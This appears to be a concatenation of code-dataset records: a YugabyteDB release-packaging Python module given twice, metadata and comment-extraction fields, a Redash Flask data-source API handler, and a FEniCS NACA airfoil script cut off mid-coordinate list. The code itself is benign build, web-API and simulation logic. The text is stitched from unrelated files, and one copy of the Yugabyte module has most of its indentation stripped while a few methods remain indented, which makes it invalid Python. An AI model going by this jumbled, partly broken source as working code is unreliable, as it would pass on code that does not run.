                elem = self.repo_expand_path(elem)
                files = glob.glob(elem)
                for file_path in files:
                    copy_deep(file_path,
                              os.path.join(current_dest_dir, os.path.basename(file_path)))
        logging.info("Created the distribution at '{}'".format(distribution_dir))

    def update_manifest(self, distribution_dir: str) -> None:
        """Replace seed sections with the actual on-disk distribution layout."""
        for release_subdir in ['bin']:
            if release_subdir in self.release_manifest:
                del self.release_manifest[release_subdir]
        for root, dirs, files in os.walk(distribution_dir):
            paths = [os.path.join(root, f) for f in files]
            # We also need to include dirs which are really links to directories.
            for d in dirs:
                path = os.path.join(root, d)
                if os.path.islink(path):
                    paths.append(path)
            self.release_manifest.setdefault(os.path.relpath(root, distribution_dir), []).extend(
                paths)
        logging.debug("Effective release manifest:\n" +
                      json.dumps(self.release_manifest, indent=2, sort_keys=True))

    @staticmethod
    def get_head_commit_hash() -> str:
        """Return the SHA1 of the repository's current HEAD commit."""
        return check_output(["git", "rev-parse", "HEAD"]).strip().decode('utf-8')

    def get_release_file(self) -> str:
        """
        This method does couple of checks before generating the release file name.
        - Checks if there are local uncommitted changes.
        - Checks if there are local commits which aren't merged upstream.
        - Reads the base version from the version.txt file and appends to the filename.
        Also fetches the platform the release file is being built and adds that to the file name
        along with commit hash and built type.
        Returns:
            (string): Release file path.
        """
        components: List[str] = [
            self.base_version,
            self.commit,
            self.build_type
        ]
        compiler_type = get_compiler_type_from_build_root(self.build_root)
        # Make the clang12 release package the default, and append the compiler type for all other
        # compiler types so we can still use them with the appropriate support from the downstream
        # tooling.
        if compiler_type != 'clang12':
            components.append(compiler_type)
        release_name = "-".join(components)
        system = platform.system().lower()
        if system == "linux":
            # We recently moved from centos7 to almalinux8 as the build host for our universal
            # x86_64 linux build. This changes the name of the release tarball we create.
            # Unfortunately, we have a lot of hard coded references to the centos package names
            # in our downstream release code. So here we munge the name to 'centos' to keep things
            # working while we fix downstream code.
            # TODO(jharveymsith): Remove the almalinux to centos mapping once downstream is fixed.
            if distro.id() == "centos" and distro.major_version() == "7" \
                    or distro.id() == "almalinux" and platform.machine().lower() == "x86_64":
                system = "centos"
            elif distro.id() == "ubuntu":
                # BUG FIX: the original compared the function object 'distro.id'
                # (not its return value) to "ubuntu", which is always False, so
                # Ubuntu hosts silently fell through to the generic branch.
                system = distro.id() + distro.version()
            else:
                system = distro.id() + distro.major_version()
        release_file_name = "{}-{}-{}-{}.tar.gz".format(
            self.package_name, release_name, system, platform.machine().lower())
        return os.path.join(self.build_path, release_file_name)

    def generate_release(self) -> str:
        """
        Generates a release package and returns the path to the release file.
        """
        yugabyte_folder_prefix = "{}-{}".format(self.package_name, self.base_version)
        tmp_parent_dir = self.distribution_path + '.tmp_for_tar_gz'
        os.mkdir(tmp_parent_dir)
        # Move the distribution directory to a new location named yugabyte-<version> and archive
        # it from there so it has the right name when extracted.
        #
        # We used to do this using the --transform option to the tar command, but that has an
        # unintended side effect of corrupting library symlinks to files in the same directory.
        tmp_distribution_dir = os.path.join(tmp_parent_dir, yugabyte_folder_prefix)
        shutil.move(self.distribution_path, tmp_distribution_dir)

        def change_permissions(mode: str) -> None:
            # Helper: recursively chmod the staged tree before archiving.
            logging.info(
                "Changing permissions recursively on directory '%s': %s", tmp_distribution_dir,
                mode)
            cmd_line = ['chmod', '-R', mode, tmp_distribution_dir]
            run_program(cmd_line, cwd=tmp_parent_dir, log_command=True)

        try:
            release_file = self.get_release_file()
            change_permissions('u+w')
            change_permissions('a+r')
            # From chmod manpage, "+X" means: set the execute/search bits if the file is a directory
            # or any of the execute/search bits are set in the original (unmodified) mode.
            change_permissions('a+X')
            logging.info("Creating a package '%s' from directory %s",
                         release_file, tmp_distribution_dir)
            run_program(['tar', 'cvzf', release_file, yugabyte_folder_prefix],
                        cwd=tmp_parent_dir)
            return release_file
        finally:
            # Always restore the distribution directory to its original location.
            shutil.move(tmp_distribution_dir, self.distribution_path)
            os.rmdir(tmp_parent_dir)
def check_for_local_changes() -> None:
    """Prompt for confirmation if the working tree differs from origin/master.

    Reports both uncommitted local changes and local commits that are not
    merged upstream; if either is found, asks the user whether to continue
    and exits with status 1 unless the answer is yes (or empty).
    """
    is_dirty = False
    # Uncommitted (or unmerged) differences against the upstream branch.
    if check_output(["git", "diff", "origin/master"]).strip():
        logging.error("Local changes exists. This shouldn't be an official release.")
        is_dirty = True
    # Local commits not present upstream.  Deliberately 'if' rather than the
    # original 'elif', so both problems are reported when both are present.
    if check_output(["git", "log", "origin/master..HEAD", "--oneline"]):
        logging.error("Local commits exists. This shouldn't be an official release.")
        is_dirty = True
    if is_dirty:
        prompt_input = input("Continue [Y/n]: ").strip().lower()
        if prompt_input not in ['y', 'yes', '']:
            sys.exit(1)
|
"""
Copyright (c) Yugabyte, Inc.
This module provides utilities for generating and publishing release.
"""
import glob
import json
import logging
import os
import platform
import shutil
import sys
import re
import distro # type: ignore
from subprocess import call, check_output
from xml.dom import minidom
from yb.command_util import run_program, mkdir_p, copy_deep
from yb.common_util import (
get_thirdparty_dir,
is_macos,
get_compiler_type_from_build_root,
)
from typing import Dict, Any, Optional, cast, List
RELEASE_MANIFEST_NAME = "yb_release_manifest.json"
RELEASE_VERSION_FILE = "version.txt"
THIRDPARTY_PREFIX_RE = re.compile('^thirdparty/(.*)$')
class ReleaseUtil(object):
"""Packages a YugaByte package with the appropriate file naming schema."""
release_manifest: Dict[str, Any]
base_version: str
repository: str
build_type: str
distribution_path: str
force: bool
commit: str
build_root: str
package_name: str
def __init__(
self,
repository: str,
build_type: str,
distribution_path: str,
force: bool,
commit: Optional[str],
build_root: str,
package_name: str) -> None:
"""
:param repository: the path to YugabyteDB repository (also known as YB_SRC_ROOT).
:param build_type: build type such as "release".
:param distribution_path: the directory where to place the resulting archive.
:param force: whether to skip the prompt in case there are local uncommitted changes.
:param commit: the Git commit SHA1 to use. If not specified, it is autodetected.
:param build_root: the build root directory corresponding to the build type.
:param package_name: the name of the top-level section of yb_release_manifest.json, such
as "yugabyte" or "yugabyte-client", specifying the set of files to
include.
"""
self.repo = repository
self.build_type = build_type
self.build_path = os.path.join(self.repo, 'build')
self.distribution_path = distribution_path
self.force = force
self.commit = commit or ReleaseUtil.get_head_commit_hash()
self.package_name = package_name
base_version = None
with open(os.path.join(self.repo, RELEASE_VERSION_FILE)) as version_file:
# Remove any build number in the version.txt.
base_version = version_file.read().split("-")[0]
assert base_version is not None, \
'Unable to read {0} file'.format(RELEASE_VERSION_FILE)
self.base_version = base_version
with open(os.path.join(self.repo, RELEASE_MANIFEST_NAME)) as release_manifest_file:
self.release_manifest = json.load(release_manifest_file)[package_name]
assert self.release_manifest is not None, \
'Unable to read {0} file'.format(RELEASE_MANIFEST_NAME)
self.build_root = build_root
pom_file = os.path.join(self.repo, 'java', 'pom.xml')
self.java_project_version = minidom.parse(pom_file).getElementsByTagName(
'version')[0].firstChild.nodeValue
logging.info("Java project version from pom.xml: {}".format(self.java_project_version))
self._rewrite_manifest()
def get_release_manifest(self) -> Dict[str, Any]:
return self.release_manifest
def get_seed_executable_patterns(self) -> List[str]:
return cast(List[str], self.release_manifest['bin'])
def expand_value(self, old_value: str) -> str:
"""
Expand old_value with the following changes:
- Replace ${project.version} with the Java version from pom.xml.
- Replace the leading "thirdparty/" with the respective YB_THIRDPARTY_DIR from the build.
- Replace $BUILD_ROOT with the actual build_root.
"""
# Substitution for Java.
new_value = old_value.replace('${project.version}', self.java_project_version)
# Substitution for thirdparty.
thirdparty_prefix_match = THIRDPARTY_PREFIX_RE.match(new_value)
if thirdparty_prefix_match:
new_value = os.path.join(get_thirdparty_dir(), thirdparty_prefix_match.group(1))
# Substitution for BUILD_ROOT.
new_value = new_value.replace("$BUILD_ROOT", self.build_root)
thirdparty_intrumentation = "uninstrumented"
new_value = new_value.replace(
"$THIRDPARTY_BUILD_SPECIFIC_DIR",
os.path.join(get_thirdparty_dir(), "installed", thirdparty_intrumentation))
if new_value != old_value:
logging.info("Substituting '{}' -> '{}' in manifest".format(
old_value, new_value))
return new_value
def _rewrite_manifest(self) -> None:
"""
Rewrite the release manifest expanding values using expand_value function.
"""
for key, values in self.release_manifest.items():
if isinstance(values, dict):
for k, v in values.items():
values[k] = self.expand_value(v)
else:
for i in range(len(values)):
values[i] = self.expand_value(values[i])
def repo_expand_path(self, path: str) -> str:
"""
If path is relative treat it as a path within repo and make it absolute.
"""
if not path.startswith('/'):
path = os.path.join(self.repo, path)
return path
def create_distribution(self, distribution_dir: str) -> None:
"""This method would read the release_manifest and traverse through the
build directory and copy necessary files/symlinks into the distribution_dir
Args:
distribution_dir (string): Directory to create the distribution
"""
for dir_from_manifest in self.release_manifest:
if dir_from_manifest == '%symlinks%':
for dst, target in self.release_manifest[dir_from_manifest].items():
dst = os.path.join(distribution_dir, dst)
logging.debug("Creating symlink {} -> {}".format(dst, target))
mkdir_p(os.path.dirname(dst))
os.symlink(target, dst)
continue
current_dest_dir = os.path.join(distribution_dir, dir_from_manifest)
mkdir_p(current_dest_dir)
for elem in self.release_manifest[dir_from_manifest]:
elem = self.repo_expand_path(elem)
files = glob.glob(elem)
for file_path in files:
copy_deep(file_path,
os.path.join(current_dest_dir, os.path.basename(file_path)))
logging.info("Created the distribution at '{}'".format(distribution_dir))
def update_manifest(self, distribution_dir: str) -> None:
for release_subdir in ['bin']:
if release_subdir in self.release_manifest:
del self.release_manifest[release_subdir]
for root, dirs, files in os.walk(distribution_dir):
paths = [os.path.join(root, f) for f in files]
# We also need to include dirs which are really links to directories.
for d in dirs:
path = os.path.join(root, d)
if os.path.islink(path):
paths.append(path)
self.release_manifest.setdefault(os.path.relpath(root, distribution_dir), []).extend(
paths)
logging.debug("Effective release manifest:\n" +
json.dumps(self.release_manifest, indent=2, sort_keys=True))
@staticmethod
def get_head_commit_hash() -> str:
return check_output(["git", "rev-parse", "HEAD"]).strip().decode('utf-8')
def get_release_file(self) -> str:
    """
    This method does couple of checks before generating the release file name.
    - Checks if there are local uncommitted changes.
    - Checks if there are local commits which aren't merged upstream.
    - Reads the base version from the version.txt file and appends to the filename.
    Also fetches the platform the release file is being built and adds that to the file name
    along with commit hash and built type.
    Returns:
        (string): Release file path.
    """
    components: List[str] = [
        self.base_version,
        self.commit,
        self.build_type
    ]
    compiler_type = get_compiler_type_from_build_root(self.build_root)
    # Make the clang12 release package the default, and append the compiler type for all other
    # compiler types so we can still use them with the appropriate support from the downstream
    # tooling.
    if compiler_type != 'clang12':
        components.append(compiler_type)
    release_name = "-".join(components)
    system = platform.system().lower()
    if system == "linux":
        # We recently moved from centos7 to almalinux8 as the build host for our universal
        # x86_64 linux build. This changes the name of the release tarball we create.
        # Unfortunately, we have a lot of hard coded references to the centos package names
        # in our downstream release code. So here we munge the name to 'centos' to keep things
        # working while we fix downstream code.
        # TODO(jharveymsith): Remove the almalinux to centos mapping once downstream is fixed.
        if distro.id() == "centos" and distro.major_version() == "7" \
                or distro.id() == "almalinux" and platform.machine().lower() == "x86_64":
            system = "centos"
        elif distro.id() == "ubuntu":
            # BUG FIX: the original compared the function object 'distro.id'
            # (not its return value) to "ubuntu", which is always False, so
            # Ubuntu hosts silently fell through to the generic branch.
            system = distro.id() + distro.version()
        else:
            system = distro.id() + distro.major_version()
    release_file_name = "{}-{}-{}-{}.tar.gz".format(
        self.package_name, release_name, system, platform.machine().lower())
    return os.path.join(self.build_path, release_file_name)
def generate_release(self) -> str:
"""
Generates a release package and returns the path to the release file.
"""
yugabyte_folder_prefix = "{}-{}".format(self.package_name, self.base_version)
tmp_parent_dir = self.distribution_path + '.tmp_for_tar_gz'
os.mkdir(tmp_parent_dir)
# Move the distribution directory to a new location named yugabyte-<version> and archive
# it from there so it has the right name when extracted.
#
# We used to do this using the --transform option to the tar command, but that has an
# unintended side effect of corrupting library symlinks to files in the same directory.
tmp_distribution_dir = os.path.join(tmp_parent_dir, yugabyte_folder_prefix)
shutil.move(self.distribution_path, tmp_distribution_dir)
def change_permissions(mode: str) -> None:
logging.info(
"Changing permissions recursively on directory '%s': %s", tmp_distribution_dir,
mode)
cmd_line = ['chmod', '-R', mode, tmp_distribution_dir]
run_program(cmd_line, cwd=tmp_parent_dir, log_command=True)
try:
release_file = self.get_release_file()
change_permissions('u+w')
change_permissions('a+r')
# From chmod manpage, "+X" means: set the execute/search bits if the file is a directory
# or any of the execute/search bits are set in the original (unmodified) mode.
change_permissions('a+X')
logging.info("Creating a package '%s' from directory %s",
release_file, tmp_distribution_dir)
run_program(['tar', 'cvzf', release_file, yugabyte_folder_prefix],
cwd=tmp_parent_dir)
return release_file
finally:
shutil.move(tmp_distribution_dir, self.distribution_path)
os.rmdir(tmp_parent_dir)
def check_for_local_changes() -> None:
    """Prompt for confirmation if the working tree differs from origin/master.

    Reports both uncommitted local changes and local commits that are not
    merged upstream; if either is found, asks the user whether to continue
    and exits with status 1 unless the answer is yes (or empty).
    """
    is_dirty = False
    # Uncommitted (or unmerged) differences against the upstream branch.
    if check_output(["git", "diff", "origin/master"]).strip():
        logging.error("Local changes exists. This shouldn't be an official release.")
        is_dirty = True
    # Local commits not present upstream.  Deliberately 'if' rather than the
    # original 'elif', so both problems are reported when both are present.
    if check_output(["git", "log", "origin/master..HEAD", "--oneline"]):
        logging.error("Local commits exists. This shouldn't be an official release.")
        is_dirty = True
    if is_dirty:
        prompt_input = input("Continue [Y/n]: ").strip().lower()
        if prompt_input not in ['y', 'yes', '']:
            sys.exit(1)
|
en
| 0.87086
|
Copyright (c) Yugabyte, Inc. This module provides utilities for generating and publishing release. # type: ignore Packages a YugaByte package with the appropriate file naming schema. :param repository: the path to YugabyteDB repository (also known as YB_SRC_ROOT). :param build_type: build type such as "release". :param distribution_path: the directory where to place the resulting archive. :param force: whether to skip the prompt in case there are local uncommitted changes. :param commit: the Git commit SHA1 to use. If not specified, it is autodetected. :param build_root: the build root directory corresponding to the build type. :param package_name: the name of the top-level section of yb_release_manifest.json, such as "yugabyte" or "yugabyte-client", specifying the set of files to include. # Remove any build number in the version.txt. Expand old_value with the following changes: - Replace ${project.version} with the Java version from pom.xml. - Replace the leading "thirdparty/" with the respective YB_THIRDPARTY_DIR from the build. - Replace $BUILD_ROOT with the actual build_root. # Substitution for Java. # Substitution for thirdparty. # Substitution for BUILD_ROOT. Rewrite the release manifest expanding values using expand_value function. If path is relative treat it as a path within repo and make it absolute. This method would read the release_manifest and traverse through the build directory and copy necessary files/symlinks into the distribution_dir Args: distribution_dir (string): Directory to create the distribution # We also need to include dirs which are really links to directories. This method does couple of checks before generating the release file name. - Checks if there are local uncommitted changes. - Checks if there are local commits which aren't merged upstream. - Reads the base version from the version.txt file and appends to the filename. 
Also fetches the platform the release file is being built and adds that to the file name along with commit hash and built type. Returns: (string): Release file path. # Make the clang12 release package the default, and append the compiler type for all other # compiler types so we can still use them with the appropriate support from the downstream # tooling. # We recently moved from centos7 to almalinux8 as the build host for our universal # x86_64 linux build. This changes the name of the release tarball we create. # Unfortunately, we have a lot of hard coded references to the centos package names # in our downsstream release code. So here we munge the name to 'centos' to keep things # working while we fix downstream code. # TODO(jharveymsith): Remove the almalinux to centos mapping once downstream is fixed. Generates a release package and returns the path to the release file. # Move the distribution directory to a new location named yugabyte-<version> and archive # it from there so it has the right name when extracted. # # We used to do this using the --transform option to the tar command, but that has an # unintended side effect of corrupting library symlinks to files in the same directory. # From chmod manpage, "+X" means: set the execute/search bits if the file is a directory # or any of the execute/search bits are set in the original (unmodified) mode.
| 2.321387
| 2
|
redash/handlers/data_sources.py
|
ivanli1990/redash
| 1
|
6627597
|
<reponame>ivanli1990/redash
import logging
from flask import make_response, request
from flask_restful import abort
from funcy import project
from six import text_type
from sqlalchemy.exc import IntegrityError
from redash import models
from redash.handlers.base import BaseResource, get_object_or_404, require_fields
from redash.permissions import (require_access, require_admin,
require_permission, view_only)
from redash.query_runner import (get_configuration_schema_for_query_runner_type,
query_runners, NotSupported)
from redash.utils import filter_none
from redash.utils.configuration import ConfigurationContainer, ValidationError
class DataSourceTypeListResource(BaseResource):
    """Admin-only listing of all registered query-runner types."""

    @require_admin
    def get(self):
        # Sort the registered query runners by display name, then serialize
        # each one for the API response.
        runners = sorted(query_runners.values(), key=lambda runner: runner.name())
        return [runner.to_dict() for runner in runners]
class DataSourceResource(BaseResource):
    """Admin operations on a single data source: view, update, delete."""

    @require_admin
    def get(self, data_source_id):
        """Return the fully serialized data source and record an audit event."""
        data_source = models.DataSource.get_by_id_and_org(data_source_id, self.current_org)
        ds = data_source.to_dict(all=True)
        self.record_event({
            'action': 'view',
            'object_id': data_source_id,
            'object_type': 'datasource',
        })
        return ds

    @require_admin
    def post(self, data_source_id):
        """Update type, name and options of an existing data source.

        Aborts with 400 on an unknown type, invalid options, or a
        duplicate name.
        """
        data_source = models.DataSource.get_by_id_and_org(data_source_id, self.current_org)
        req = request.get_json(True)
        schema = get_configuration_schema_for_query_runner_type(req['type'])
        if schema is None:
            abort(400)
        try:
            data_source.options.set_schema(schema)
            data_source.options.update(filter_none(req['options']))
        except ValidationError:
            abort(400)
        data_source.type = req['type']
        data_source.name = req['name']
        models.db.session.add(data_source)
        try:
            models.db.session.commit()
        except IntegrityError as e:
            # BUG FIX: exceptions have no '.message' attribute on Python 3;
            # inspect str(e) to detect the duplicate-name constraint violation.
            if req['name'] in str(e):
                abort(400, message="Data source with the name {} already exists.".format(req['name']))
            abort(400)
        return data_source.to_dict(all=True)

    @require_admin
    def delete(self, data_source_id):
        """Delete the data source and record an audit event; returns 204."""
        data_source = models.DataSource.get_by_id_and_org(data_source_id, self.current_org)
        data_source.delete()
        self.record_event({
            'action': 'delete',
            'object_id': data_source_id,
            'object_type': 'datasource',
        })
        return make_response('', 204)
class DataSourceListResource(BaseResource):
    """Listing of visible data sources and creation of new ones."""

    @require_permission('list_data_sources')
    def get(self):
        """Return the data sources visible to the current user, sorted by name."""
        if self.current_user.has_permission('admin'):
            data_sources = models.DataSource.all(self.current_org)
        else:
            data_sources = models.DataSource.all(self.current_org, group_ids=self.current_user.group_ids)
        response = {}
        for ds in data_sources:
            # A data source may be reachable through several groups; keep one entry.
            if ds.id in response:
                continue
            try:
                d = ds.to_dict()
                # view_only is True only if every group granting access is view-only.
                d['view_only'] = all(project(ds.groups, self.current_user.group_ids).values())
                response[ds.id] = d
            except AttributeError:
                logging.exception("Error with DataSource#to_dict (data source id: %d)", ds.id)
        self.record_event({
            'action': 'list',
            'object_id': 'admin/data_sources',
            'object_type': 'datasource',
        })
        return sorted(response.values(), key=lambda d: d['name'].lower())

    @require_admin
    def post(self):
        """Create a new data source; aborts with 400 on invalid input."""
        req = request.get_json(True)
        require_fields(req, ('options', 'name', 'type'))
        schema = get_configuration_schema_for_query_runner_type(req['type'])
        if schema is None:
            abort(400)
        config = ConfigurationContainer(filter_none(req['options']), schema)
        if not config.is_valid():
            abort(400)
        try:
            datasource = models.DataSource.create_with_group(org=self.current_org,
                                                             name=req['name'],
                                                             type=req['type'],
                                                             options=config)
            models.db.session.commit()
        except IntegrityError as e:
            # BUG FIX: exceptions have no '.message' attribute on Python 3;
            # inspect str(e) to detect the duplicate-name constraint violation.
            if req['name'] in str(e):
                abort(400, message="Data source with the name {} already exists.".format(req['name']))
            abort(400)
        self.record_event({
            'action': 'create',
            'object_id': datasource.id,
            'object_type': 'datasource'
        })
        return datasource.to_dict(all=True)
class DataSourceSchemaResource(BaseResource):
    """Expose the table/column schema of a single data source."""

    def get(self, data_source_id):
        # View-only access is sufficient to read the schema.
        data_source = get_object_or_404(
            models.DataSource.get_by_id_and_org, data_source_id, self.current_org)
        require_access(data_source, self.current_user, view_only)

        # Presence of any 'refresh' query argument forces a cache refresh.
        should_refresh = request.args.get('refresh') is not None

        result = {}
        try:
            result['schema'] = data_source.get_schema(should_refresh)
        except NotSupported:
            result['error'] = {
                'code': 1,
                'message': 'Data source type does not support retrieving schema'
            }
        except Exception:
            result['error'] = {
                'code': 2,
                'message': 'Error retrieving schema.'
            }

        return result
class DataSourcePauseResource(BaseResource):
    """Pause (POST) or resume (DELETE) query execution for a data source."""

    @require_admin
    def post(self, data_source_id):
        data_source = get_object_or_404(
            models.DataSource.get_by_id_and_org, data_source_id, self.current_org)

        # The pause reason may arrive either in the JSON body or as a query arg.
        body = request.get_json(force=True, silent=True)
        reason = body.get('reason') if body else request.args.get('reason')

        data_source.pause(reason)
        self.record_event({
            'action': 'pause',
            'object_id': data_source.id,
            'object_type': 'datasource'
        })
        return data_source.to_dict()

    @require_admin
    def delete(self, data_source_id):
        data_source = get_object_or_404(
            models.DataSource.get_by_id_and_org, data_source_id, self.current_org)
        data_source.resume()
        self.record_event({
            'action': 'resume',
            'object_id': data_source.id,
            'object_type': 'datasource'
        })
        return data_source.to_dict()
class DataSourceTestResource(BaseResource):
    """Run a connectivity test against a data source (admin only)."""

    @require_admin
    def post(self, data_source_id):
        data_source = get_object_or_404(
            models.DataSource.get_by_id_and_org, data_source_id, self.current_org)

        # Record the attempt regardless of the outcome of the connection test.
        self.record_event({
            'action': 'test',
            'object_id': data_source_id,
            'object_type': 'datasource',
        })

        try:
            data_source.query_runner.test_connection()
        except Exception as e:
            return {"message": text_type(e), "ok": False}
        return {"message": "success", "ok": True}
|
import logging
from flask import make_response, request
from flask_restful import abort
from funcy import project
from six import text_type
from sqlalchemy.exc import IntegrityError
from redash import models
from redash.handlers.base import BaseResource, get_object_or_404, require_fields
from redash.permissions import (require_access, require_admin,
require_permission, view_only)
from redash.query_runner import (get_configuration_schema_for_query_runner_type,
query_runners, NotSupported)
from redash.utils import filter_none
from redash.utils.configuration import ConfigurationContainer, ValidationError
class DataSourceTypeListResource(BaseResource):
    """Admin-only listing of every available query-runner type."""

    @require_admin
    def get(self):
        # Sort runners alphabetically by their display name before serialising.
        runners = sorted(query_runners.values(), key=lambda runner: runner.name())
        return [runner.to_dict() for runner in runners]
class DataSourceResource(BaseResource):
    """Admin CRUD operations on a single data source."""

    @require_admin
    def get(self, data_source_id):
        """Return the full (all=True, secrets included) representation of a data source."""
        data_source = models.DataSource.get_by_id_and_org(data_source_id, self.current_org)
        ds = data_source.to_dict(all=True)
        self.record_event({
            'action': 'view',
            'object_id': data_source_id,
            'object_type': 'datasource',
        })
        return ds

    @require_admin
    def post(self, data_source_id):
        """Update a data source's type, name and options.

        Aborts with 400 on an unknown type, invalid options, or a
        duplicate name within the organization.
        """
        data_source = models.DataSource.get_by_id_and_org(data_source_id, self.current_org)
        req = request.get_json(True)

        schema = get_configuration_schema_for_query_runner_type(req['type'])
        if schema is None:
            abort(400)

        try:
            data_source.options.set_schema(schema)
            data_source.options.update(filter_none(req['options']))
        except ValidationError:
            abort(400)

        data_source.type = req['type']
        data_source.name = req['name']
        models.db.session.add(data_source)

        try:
            models.db.session.commit()
        except IntegrityError as e:
            # BUG FIX: `e.message` does not exist on Python 3 exceptions and
            # raises AttributeError there; text_type(e) works on both 2 and 3.
            if req['name'] in text_type(e):
                abort(400, message="Data source with the name {} already exists.".format(req['name']))
            abort(400)

        return data_source.to_dict(all=True)

    @require_admin
    def delete(self, data_source_id):
        """Delete a data source and return 204 No Content."""
        data_source = models.DataSource.get_by_id_and_org(data_source_id, self.current_org)
        data_source.delete()
        self.record_event({
            'action': 'delete',
            'object_id': data_source_id,
            'object_type': 'datasource',
        })
        return make_response('', 204)
class DataSourceListResource(BaseResource):
    @require_permission('list_data_sources')
    def get(self):
        """List the data sources visible to the current user, sorted by name."""
        if self.current_user.has_permission('admin'):
            data_sources = models.DataSource.all(self.current_org)
        else:
            data_sources = models.DataSource.all(self.current_org,
                                                 group_ids=self.current_user.group_ids)

        response = {}
        for ds in data_sources:
            if ds.id in response:
                continue

            try:
                d = ds.to_dict()
                # view_only only when every group granting access is view-only.
                d['view_only'] = all(project(ds.groups, self.current_user.group_ids).values())
                response[ds.id] = d
            except AttributeError:
                logging.exception("Error with DataSource#to_dict (data source id: %d)", ds.id)

        self.record_event({
            'action': 'list',
            'object_id': 'admin/data_sources',
            'object_type': 'datasource',
        })

        return sorted(response.values(), key=lambda d: d['name'].lower())

    @require_admin
    def post(self):
        """Create a new data source; 400 on bad type/options or duplicate name."""
        req = request.get_json(True)
        require_fields(req, ('options', 'name', 'type'))

        schema = get_configuration_schema_for_query_runner_type(req['type'])
        if schema is None:
            abort(400)

        config = ConfigurationContainer(filter_none(req['options']), schema)
        if not config.is_valid():
            abort(400)

        try:
            datasource = models.DataSource.create_with_group(org=self.current_org,
                                                             name=req['name'],
                                                             type=req['type'],
                                                             options=config)
            models.db.session.commit()
        except IntegrityError as e:
            # BUG FIX: `e.message` does not exist on Python 3 exceptions and
            # raises AttributeError there; text_type(e) works on both 2 and 3.
            if req['name'] in text_type(e):
                abort(400, message="Data source with the name {} already exists.".format(req['name']))
            abort(400)

        self.record_event({
            'action': 'create',
            'object_id': datasource.id,
            'object_type': 'datasource'
        })

        return datasource.to_dict(all=True)
class DataSourceSchemaResource(BaseResource):
    def get(self, data_source_id):
        """Return the (optionally refreshed) schema of a data source."""
        data_source = get_object_or_404(models.DataSource.get_by_id_and_org,
                                        data_source_id, self.current_org)
        require_access(data_source, self.current_user, view_only)

        should_refresh = request.args.get('refresh') is not None
        response = {}
        try:
            response['schema'] = data_source.get_schema(should_refresh)
        except NotSupported:
            response['error'] = {
                'code': 1,
                'message': 'Data source type does not support retrieving schema'
            }
        except Exception:
            # Any other failure is reported to the client as a generic error.
            response['error'] = {
                'code': 2,
                'message': 'Error retrieving schema.'
            }
        return response
class DataSourcePauseResource(BaseResource):
    @require_admin
    def post(self, data_source_id):
        """Pause a data source, optionally recording a reason."""
        data_source = get_object_or_404(models.DataSource.get_by_id_and_org,
                                        data_source_id, self.current_org)
        # Accept the reason either in a JSON body or as a query parameter.
        payload = request.get_json(force=True, silent=True)
        reason = payload.get('reason') if payload else request.args.get('reason')
        data_source.pause(reason)
        self.record_event({
            'action': 'pause',
            'object_id': data_source.id,
            'object_type': 'datasource'
        })
        return data_source.to_dict()

    @require_admin
    def delete(self, data_source_id):
        """Resume (un-pause) a data source."""
        data_source = get_object_or_404(models.DataSource.get_by_id_and_org,
                                        data_source_id, self.current_org)
        data_source.resume()
        self.record_event({
            'action': 'resume',
            'object_id': data_source.id,
            'object_type': 'datasource'
        })
        return data_source.to_dict()
class DataSourceTestResource(BaseResource):
    @require_admin
    def post(self, data_source_id):
        """Run the query runner's connection test and report the outcome."""
        data_source = get_object_or_404(models.DataSource.get_by_id_and_org,
                                        data_source_id, self.current_org)
        self.record_event({
            'action': 'test',
            'object_id': data_source_id,
            'object_type': 'datasource',
        })
        try:
            data_source.query_runner.test_connection()
        except Exception as e:
            return {"message": text_type(e), "ok": False}
        return {"message": "success", "ok": True}
|
en
| 0.353307
|
#to_dict (data source id: %d)", ds.id) # from IPython import embed # embed()
| 1.835318
| 2
|
NACA.py
|
ciaid-colombia/airfoil
| 0
|
6627598
|
<filename>NACA.py
##http://airfoiltools.com/airfoil/naca4digit
from dolfin import *
import ufl
import time
import os
import mshr
# get file name
fileName = os.path.splitext(__file__)[0]
parameters["form_compiler"]["cpp_optimize"] = True
parameters["form_compiler"]["quadrature_degree"] = 8
#parameters["form_compiler"]["quadrature_rule"] = 'auto'
comm = mpi_comm_world()
rank = MPI.rank(comm)
set_log_level(INFO if rank==0 else INFO+1)
ufl.set_level(ufl.INFO if rank==0 else ufl.INFO+1)
parameters["std_out_all_processes"] = False;
info_blue(dolfin.__version__)
# Time stepping parameters
dt = 0.01
t_end = 1.0
theta=Constant(0.5) # theta schema
k=Constant(1.0/dt)
g=Constant((0.0,-1.0))
## Create mesh
channel = mshr.Rectangle(Point(-1.0, -0.5),Point(2, 0.5))
# Create list of polygonal domain vertices for the car
domain_vertices = [Point(1, 0 ),
Point( 1.000167, 0.001249 ),
Point( 0.998653, 0.001668 ),
Point( 0.994122, 0.002919 ),
Point( 0.986596, 0.004976 ),
Point( 0.976117, 0.007801 ),
Point( 0.962742, 0.011341 ),
Point( 0.946545, 0.015531 ),
Point( 0.927615, 0.020294 ),
Point( 0.906059, 0.025547 ),
Point( 0.881998, 0.031197 ),
Point( 0.855570, 0.037149 ),
Point( 0.826928, 0.043305 ),
Point( 0.796239, 0.049564 ),
Point( 0.763684, 0.055826 ),
Point( 0.729457, 0.061992 ),
Point( 0.693763, 0.067967 ),
Point( 0.656819, 0.073655 ),
Point( 0.618851, 0.078967 ),
Point( 0.580092, 0.083817 ),
Point( 0.540785, 0.088125 ),
Point( 0.501176, 0.091816 ),
Point( 0.461516, 0.094825 ),
Point( 0.422059, 0.097095 ),
Point( 0.382787, 0.098537 ),
Point( 0.343868, 0.098810 ),
Point( 0.305921, 0.097852 ),
Point( 0.269212, 0.095696 ),
Point( 0.234002, 0.092400 ),
Point( 0.200538, 0.088046 ),
Point( 0.169056, 0.082736 ),
Point( 0.139770, 0.076589 ),
Point( 0.112880, 0.069743 ),
Point( 0.088560, 0.062343 ),
Point( 0.066964, 0.054540 ),
Point( 0.048221, 0.046485 ),
Point( 0.032437, 0.038325 ),
Point( 0.019693, 0.030193 ),
Point( 0.010051, 0.022209 ),
Point( 0.003547, 0.014471 ),
Point( 0.000198, 0.007052 ),
Point( 0.000000, 0.000000 ),
Point( 0.002885, -0.006437 ),
Point( 0.008765, -0.012027 ),
Point( 0.017579, -0.016779 ),
Point( 0.029250, -0.020704 ),
Point( 0.043684, -0.023825 ),
Point( 0.060773, -0.026172 ),
Point( 0.080396, -0.027782 ),
Point( 0.102423, -0.028706 ),
Point( 0.126714, -0.029000 ),
Point( 0.153123, -0.028734 ),
Point( 0.181496, -0.027986 ),
Point( 0.211676, -0.026843 ),
Point( 0.243500, -0.025401 ),
Point( 0.276797, -0.023760 ),
Point( 0.311396, -0.022023 ),
Point( 0.347115, -0.020295 ),
